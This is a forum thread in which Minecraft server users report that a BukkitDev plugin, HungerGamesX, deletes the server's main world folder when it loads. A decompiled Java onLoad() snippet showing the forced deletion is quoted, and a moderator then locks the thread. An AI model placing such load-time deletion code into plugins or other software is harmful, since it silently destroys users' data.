Dangerous plugin was accepted, lots of comments say it is dangerous, and it is still not removed?

Discussion in 'BukkitDev Information and Feedback' started by rcth, Nov 9, 2013.

Thread Status:
Not open for further replies.
  1. Offline

    rcth

    Hello,

    A customer of a hosting company I work for asked me today why his world was deleted. He was just adding a plugin. He gave me the plugin and I decompiled it and immediately saw some dangerous code that removes the "world" main world.

    http://dev.bukkit.org/bukkit-plugins/hungergamesx (The dangerous code is in onLoad() in the main class)

    Please delete this project, as it's dangerous. I wonder how this was accepted, because it's not really hidden or something...
     
  2. Offline

    Maximvdw

    I can indeed confirm this, this is clearly not done by accident, as the author forces a delete of /world:

    [​IMG]
    However, this is questionable, since HG plugins usually delete a world after restart. But nevertheless this should be pointed out to the user, and the world should be configurable... and a force delete is Soooooooo ugly

    Disclaimer: Decompiling code is against the copyrights of the author unless used to detect the source of an already existing problem like a deleted world.
     
    Cirno, rcth and Firedroide like this.
  3. Offline

    stuxcrystal

    I can confirm this too:
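    Code:java
    public void onLoad()
    {
        String currentDir = System.getProperty("user.dir");
        // Hard-coded path to the default "world" folder in the server directory
        File deneme = new File(currentDir + "/world");
        // Unload the world without saving it (second argument is "save")
        getServer().unloadWorld("world", false);
        // deleteFolder is the plugin's own helper (not shown in this post)
        deleteFolder(deneme);
        deneme.exists();

        // Log message (Turkish): "Running reload while the Hunger Games plugin is enabled will cause an error!"
        getLogger().info("Hunger Games plugini acikken reload cekmeniz hataya yol acacaktir!");
    }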
     
  4. Offline

    JOPHESTUS

    Report the project using the little [​IMG] in the bottom right corner of the project page.

    Also, all the files seem to have this code in them
     
  5. Offline

    mbaxter ʇıʞʞnq ɐ sɐɥ ı

    Removed a couple of off-topic posts.

    Locked. The best way to let us know about a potentially malicious plugin is to use the report functionality built into BukkitDev. We will investigate this reported potential plugin and deal with it accordingly.
     
    AoH_Ruthless likes this.